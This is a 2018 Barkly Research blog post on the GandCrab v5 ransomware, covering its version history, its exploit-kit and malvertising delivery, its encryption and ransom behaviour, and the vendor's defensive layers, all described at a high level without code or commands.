Barkly vs Malware
Barkly Research
Oct 2018

2018's Most Active Ransomware: The Ongoing Evolution of GandCrab


Photo by paulsimonthomas

The discovery of GandCrab v5 reveals 2018's most prolific ransomware is continuing to experiment with new features. Find out what's new and how to protect your organization.

Researchers announced the discovery of GandCrab v5 last week, the latest major update to a strain of ransomware that has gained significant traction in the criminal community this year. In this post, we'll highlight what's new with the latest version, including changes to its encryption routine and how the ransomware is being delivered. But first, let's take a quick look back at how we got here.

Ransomware goes agile: Tracking the many iterations of GandCrab in 2018


Timeline of primary GandCrab updates. Click to expand

It's been a busy year for the criminals behind GandCrab. First appearing in late January, the ransomware found success almost immediately, infecting more than 50,000 victims in less than a month. The success also earned the group the attention of the authorities, however, and in late February a collaboration between Bitdefender, Europol, and the Romanian Police resulted in the seizure of command-and-control servers and the release of a decryption tool victims could use to recover their encrypted files. 

The raid was unfortunately just a minor setback. Within a week the GandCrab v2 was released, rendering the decryption tool ineffective. 

GandCrab authors would continue iterating from there, consistently making tweaks, issuing updates, and fixing bugs on a regular basis. Thanks in part to this "agile" approach, GandCrab has managed to stay one step ahead of many traditional security solutions and gain widespread popularity amongst criminals who rent it out for use in their own campaigns. 

GandCrab Version 5   


GandCrab v5 was discovered on September 24, but, true to form, its authors busily spent the next week working out kinks and making minor changes, resulting in version 5.0.4 appearing by October 2.   

Some of the immediate changes in version 5 included appending a random 5-character extension to encrypted files and changes to the ransom note. But later, security researcher Valthek noticed the ransomware appeared to be attempting to incorporate the same exploit code for the Windows Task Scheduler ALPC zero-day vulnerability (CVE-2018-8440) publicly released in late August. If utilized correctly, the exploit can provide GandCrab attacks with an avenue for elevating privileges once the ransomware is installed on infected machines. Microsoft released a fix for the vulnerability as part of its September 2018 updates. If they haven't already, organizations are advised to patch to mitigate that specific threat as soon as possible. 

How victims are getting infected with GandCrab v5


GandCrab attack diagram. Click to expand

GandCrab v5 was initially reported being delivered via the Fallout exploit kit, though there are indications that Fallout may now be delivering Kraken ransomware, instead.   

As researches at FireEye explain, Fallout works by compromising ad networks so ads with malicious code hidden inside them show up on legitimate websites (a technique referred to as malvertising). The exploit kit currently contains code to take advantage of CVE-2018-8174, a VBScript vulnerability. If a user has a vulnerable system, the exploit kit will trigger a process that downloads and executes GandCrab on the user's machine. If the user's system is patched, they are directed to social engineering prompts that attempt to trick the user into downloading the payload, instead. 



Social engineering lures used to trick users into downloading GandCrab on fully patched machines. Source: FireEye

GandCrab has also previously been distributed via spam emails with malicious attachments, so organizations should be prepared to see the ransomware potentially using that popular attack vector, as well. 


Encryption and extortion

Once installed, GandCrab scans the compromised system and any network shares (not just mapped drives) for files to encrypt. It also has the ability to kill processes related to popular applications such as Word, Excel, etc. in order to encrypt files currently in use. When it encrypts files, GandCrab adds a random 5-character file extension, and drops a .txt ransom note files. In addition, the victim's desktop wallpaper will be changed to instruct them to read the ransom note. 

You can see what the encryption process looks like in the video below:


Victims are directed to a Tor site, where they are presented with the ransom amount (currently $800 USD to be paid in DASH cryptocurrency) and instructions on how to pay. 

Unfortunately, there is no free decryption tool available to help victims of GandCrab at this time. As with most ransomware, the best option is to take precautions to avoid infections in the first place, and to be prepared with system backup and recovery options if an infection does take place. 

Researcher Valthek has developed a "vaccine" that prevents computers from being infected with GandCrab.  

It should be noted that a vaccine was also previously developed for GandCrab version 4.1.2 by security vendor AhnLab, resulting in a bitter reaction from the GandCrab author(s). Unfortunately, it was short-lived and rendered ineffective by a subsequent GandCrab update.

Blocking GandCrab with Barkly

Barkly-vs-GandCrab-v5-diagramGandCrab's constant updates present a challenge for traditional security solutions that rely on creating and maintaining lists of malicious signatures. The use of multiple attack vectors along with constant changes to the ransomware's code puts an emphasis on defense in depth. 

Barkly provides organizations with multiple layers of protection from the latest GandCrab versions by blocking their delivery and their behavior in addition to the ransomware payloads, themselves. 

  • Barkly prevents initial delivery by blocking attempts to exploit CVE-2018-8174 and stopping malicious macros from utilizing PowerShell to download files from the Internet. That means the majority of attacks are blocked before the GandCrab payload can even touch the machine. 
  • For attacks that do manage to install GandCrab, Barkly blocks the executable before it has a chance to launch.
  • In the unlikely event a new version of GandCrab somehow was able to launch, Barkly has behavioral controls in place that prevent ransomware activity such as attempts to delete volume shadow copies. 


For organizations that aren't in a position to utilize Barkly, it can still be helpful to consider positioning defenses in a similar way to eliminate single points of failure and provide protections/mitigations addressing each stage of attacks. You can get tips for doing just that in our eBook, The Essential Guide to Blocking Malware without a SOC

Learn how Barkly can help you replace your antivirus with stronger, smarter protection. 

Want to see Barkly in action for yourself? See a demo. 

Barkly Research

Barkly Research

Barkly's malware research team is hard at work stopping new malware that sneaks past antivirus.


Don't be the last to know about new attacks

Join a group of 10,000 IT and security pros who get clear, actionable takes on malware and infosec news.



Stay informed!

Get the latest security news, tips, and trends straight to your inbox.

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.